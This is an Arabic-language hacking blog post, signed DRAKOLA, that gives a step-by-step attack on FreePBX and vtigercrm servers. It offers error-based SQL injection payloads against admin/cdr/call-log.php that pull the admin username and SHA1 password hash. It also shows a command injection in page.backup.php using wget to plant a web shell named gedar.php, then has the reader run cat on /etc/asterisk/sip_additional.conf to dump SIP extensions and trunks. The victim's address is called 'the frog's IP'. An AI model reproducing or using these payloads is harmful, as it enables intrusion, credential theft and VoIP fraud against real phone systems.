ثغرة FreePBX

ثغرة FreePBX

هاد ثغرة الفري بيبي اكس لا شك انها قديمة و لكن لعل وعسى انو يستفيد منها احد الاخوة

/vtigercrm/config.aaal.php

cat /etc/asterisk/sip_additional.conf

/vtigercrm/config.all.php?act=f&f=&d=%2Fvar%2Fwww%2Fhtml%2Fvt igercrm&
================================================== =========================

admin/cdr/call-log.php

كود استخراج يوزر الادمن

1' and(select 1 from(select count(*),concat((select (select (SELECT concat(ampusers.username) FROM
`asterisk`.ampusers LIMIT 0,1) ) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

كود استخراج باسويرد الادمن

1' and(select 1 from(select count(*),concat((select (select (SELECT concat(ampusers.password_sha1) FROM
`asterisk`.ampusers LIMIT 0,1) ) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

================================================== ================================================== ======
بتحط بعد ايبي الضفدع
: الرابط هاد
/admin/modules/backup/page.backup.php
action=deletedataset&dir=';wget
لو فااات معك رح يكتبللك backup
الان اخي بتمسح الرابط الي فوق لاى عند كللمه page
وبتكتب كلمه
gedar.php
ودوس انتر
رح يفتح معك الشل
انتر
الان انزل الى شمال الصفحه رح تلاقي كللمه على الشمال وتحتها مربع فاضي... بنحط اللنك في المربع ورح يطللع معك كل الاكستنشات والترنكات===هاي اللنك===
cat /etc/asterisk/sip_additional.conf
================================================== ================================================== ====

ثغرة FreePBX

DRAKOLA

تعليقات

الدرس الرابع : شرح برنامج Router Scan مع التحميل

اضغط ESC للإغلاق

مشاركة

رسائل أحدث

رسائل أقدم

تعليقات